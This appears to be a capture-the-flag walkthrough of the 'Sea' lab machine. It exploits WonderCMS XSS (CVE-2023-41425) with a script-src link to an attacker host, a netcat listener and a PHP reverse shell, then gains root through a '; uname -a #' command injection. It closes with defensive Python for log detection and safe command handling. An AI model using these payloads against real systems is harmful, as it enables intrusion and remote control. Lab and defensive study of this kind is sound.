This is an Ubuntu 20.04 machine hosting a web site built with WonderCMS 3.2.0, a version vulnerable to XSS (CVE-2023-41425). Using an exploit available on GitHub, we get initial access as www-data. Then we find a Blowfish hash in a JS configuration file that, once cracked, allows us to move laterally to another user with enough permissions to read the first flag. For escalation, we abuse an internal system-monitoring web application under development that runs with root permissions and turns out to be vulnerable to command injection.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-11 16:49 EDT
Nmap scan report for 10.10.11.28
Host is up, received user-set (0.045s latency).
Not shown: 45417 closed tcp ports (conn-refused), 20116 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds
Enumerate the open ports.
> nmap $target -p22,80 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-11 16:50 EDT
Nmap scan report for 10.10.11.28
Host is up, received user-set (0.044s latency).
Scanned at 2024-08-11 16:50:39 EDT for 14s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e354e072203c014293d1669d900cabe8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZDkHH698ON6uxM3eFCVttoRXc1PMUSj8hDaiwlDlii0p8K8+6UOqhJno4Iti+VlIcHEc2THRsyhFdWAygICYaNoPsJ0nhkZsLkFyu/lmW7frIwINgdNXJOLnVSMWEdBWvVU7owy+9jpdm4AHAj6mu8vcPiuJ39YwBInzuCEhbNPncrgvXB1J4dEsQQAO4+KVH+QZ5ZCVm1pjXTjsFcStBtakBMykgReUX9GQJ9Y2D2XcqVyLPxrT98rYy+n5fV5OE7+J9aiUHccdZVngsGC1CXbbCT2jBRByxEMn+Hl+GI/r6Wi0IEbSY4mdesq8IHBmzw1T24A74SLrPYS9UDGSxEdB5rU6P3t91rOR3CvWQ1pdCZwkwC4S+kT35v32L8TH08Sw4Iiq806D6L2sUNORrhKBa5jQ7kGsjygTf0uahQ+g9GNTFkjLspjtTlZbJZCWsz2v0hG+fzDfKEpfC55/FhD5EDbwGKRfuL/YnZUPzywsheq1H7F0xTRTdr4w0At8=
| 256 f3244b08aa519d56153d6756747c2038 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMMoxImb/cXq07mVspMdCWkVQUTq96f6rKz6j5qFBfFnBkdjc07QzVuwhYZ61PX1Dm/PsAKW0VJfw/mctYsMwjM=
| 256 30b105c64150ff22a37f41060e67fd50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHuXW9Vi0myIh6MhZ28W8FeJo0FRKNduQvcSzUAkWw7z
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds
Download and inspect the README.md file to get info about the CMS.
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
Once we know the CMS is WonderCMS, we can obtain the version with curl.
Follow the exploit author's instructions: first, run the exploit to generate an xss.js file.
> python3 exploit.py http://10.10.14.28/index.php?page=loginURL 10.10.xxx.xxx 1919
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 1919
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/index.php?page=index.php?page=loginURL?"></form><script+src="http://10.10.14.147:8000/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.28 - - [15/Aug/2024 10:57:11] "GET /xss.js HTTP/1.1" 200 -
Note that /index.php?page=loginURL is taken from the exploit code and is accessible via Firefox.
The exploit outputs a file xss.js and returns a link to be inserted in the contact page. Before that, we need to modify the xss.js file, since it cannot be used as-is: change the URL from which it downloads shell.php. By default the exploit points to a GitHub URL that does not work, so modify the reverse shell URL to point to your machine.
Now start a Python HTTP server to serve the shell.php file (for example, a PentestMonkey PHP reverse shell) and insert the link in the contact.php form.
Shortly after the form is submitted, a request for the xss.js file arrives at the exploit's listener, followed by a request for shell.php on our local Python HTTP server.
Now the reverse shell is stored in /themes/revshell-main/shell.php. Trigger it with curl.
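From the defender's side, the delivery link above leaves a distinctive trace in the Apache access log: a page parameter that carries HTML tags and a script src pointing at an external host. The following Python is an added example, not part of the original exploit or of WonderCMS; it parses constructed sample access-log lines (IPs and timestamps are made up to match the walkthrough) and flags that pattern. The regexes, field names and finding labels are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache combined-format access-log lines (not captured from the box):
# two ordinary requests and one carrying the injected markup in the page parameter.
SAMPLE_ACCESS_LOG = """\
10.10.14.147 - - [15/Aug/2024:10:55:02 -0400] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.147 - - [15/Aug/2024:10:55:40 -0400] "POST /contact.php HTTP/1.1" 200 312 "http://sea.htb/contact.php" "Mozilla/5.0"
10.10.14.147 - - [15/Aug/2024:10:57:10 -0400] "GET /index.php?page=index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.147:8000/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Fields of the combined log format that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup that has no business inside the query string of a CMS page request.
MARKUP_RE = re.compile(r'<\s*/?\s*(script|form|iframe|img|svg|object)\b', re.IGNORECASE)
# A src= attribute that loads from another origin (absolute or scheme-relative URL).
EXTERNAL_SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?\s*(?:https?:)?//', re.IGNORECASE)


def decode_target(target, rounds=3):
    """URL-decode the request target repeatedly so double encoding does not hide the tags."""
    current = target
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def analyze_line(line):
    """Parse one access-log line; return a record with its findings, or None if unparsable."""
    match = LOG_RE.match(line)
    if not match:
        return None
    decoded = decode_target(match.group("target"))
    findings = []
    if MARKUP_RE.search(decoded):
        findings.append("html-tag-in-request")
    if EXTERNAL_SRC_RE.search(decoded):
        findings.append("external-script-src")
    return {
        "ip": match.group("ip"),
        "timestamp": match.group("ts"),
        "method": match.group("method"),
        "status": match.group("status"),
        "target": decoded,
        "findings": findings,
    }


def find_injection_attempts(log_text):
    """Return the parsed records that triggered at least one finding."""
    hits = []
    for line in log_text.splitlines():
        record = analyze_line(line)
        if record and record["findings"]:
            hits.append(record)
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_ACCESS_LOG):
        print(f'{hit["timestamp"]} {hit["ip"]} {hit["method"]} {", ".join(hit["findings"])}')
        print("    ", hit["target"])
```

Run it over a real access.log by replacing SAMPLE_ACCESS_LOG with the file contents; the repeated decoding matters because a payload sent as %253Cscript%253E would otherwise slip past a single-pass check. The external-src finding is the higher-confidence one, since a legitimate WonderCMS page request never needs a script loaded from another host in its query string.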
Forward the port to Kali and browse to it locally with Firefox: a system monitor application appears (use Amay's credentials to log in).
It looks like it runs in a root context, since it allows system management, which makes it a candidate for command injection. Launch a log file analysis and capture the request with Burp Suite.
A POST request is sent with two parameters, log_file and analyze_log.
After trying several payloads, we discover that the log_file parameter is vulnerable to command injection.
The format of the payload is the following:
; uname -a #
There must be a blank space after the semicolon, and a hash character (#) at the end of the line. The semicolon is used to chain our command onto the one the application builds, whereas the hash comments out anything the application appends after it (similar to SQL injection).
With this in mind, let's insert a reverse shell payload with Burp Suite and start a listener to catch it.
The received shell is not very stable, but you'll have enough time to dump the root flag.
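The log_file injection above works because the parameter value ends up inside a shell command line. As an added example, not the monitoring application's real code (its source is not on the page; the log directory, the allowlist and all function names are my own assumptions), the following Python shows that vulnerable pattern next to a hardened handler: it accepts only allowlisted log names, checks that the resolved path stays under the log directory, and invokes tail as an argv list without a shell, so the value can never be parsed as commands. A small detector for the metacharacters the payload relies on is included for request logging.

```python
import os
import re
import subprocess

# Assumed layout of the monitoring app's log directory and the names it may
# analyse (constructed for this example; the box's source is not on the page).
LOG_DIR = "/var/log"
ALLOWED_LOGS = frozenset({"auth.log", "syslog", "apache2/access.log", "apache2/error.log"})

# Anything that can change what a shell would execute: separators, redirects,
# substitution, quoting, and the comment marker the walkthrough's payload uses.
SHELL_META_RE = re.compile(r'[;&|`$(){}<>\n\r\\\'"#]')


def build_vulnerable_command(log_file):
    """Hypothetical vulnerable pattern: the parameter is pasted into one shell string.
    With log_file = '; uname -a #' a shell would run 'cat /var/log/' (which fails),
    then 'uname -a', and the '#' comments out the rest of the pipeline."""
    return f"cat {LOG_DIR}/{log_file} | tail -n 50"


def looks_like_injection(value):
    """Detection helper: True if the parameter contains shell metacharacters."""
    return bool(SHELL_META_RE.search(value))


def resolve_log_file(name, base=LOG_DIR, allowed=ALLOWED_LOGS):
    """Return the real path of an allowlisted log name, or None if it is rejected.
    The allowlist is the primary control; the containment check additionally guards
    against '..' segments and symlinks if the allowlist is ever widened to a pattern."""
    if name not in allowed:
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def build_tail_argv(name, lines=50):
    """Hardened form: an argv list for subprocess with shell=False, so the user value
    is always a single argument and never interpreted by a shell."""
    path = resolve_log_file(name)
    if path is None:
        raise ValueError("log_file not permitted")
    return ["tail", "-n", str(lines), path]


def analyze_log(name):
    """Run the analysis safely; returns the tail of the log or raises ValueError."""
    result = subprocess.run(build_tail_argv(name), capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for value in ["auth.log", "../../etc/passwd", "; uname -a #"]:
        print(f"{value!r}: injection={looks_like_injection(value)} resolved={resolve_log_file(value)}")
```

The decisive change is build_tail_argv: once the command is an argument vector rather than a string, there is no shell to honour the semicolon or the hash, and rejecting unknown names before that point removes path traversal as well. looks_like_injection is not a substitute for the allowlist; its purpose is to log and alert on attempts such as the one in this walkthrough.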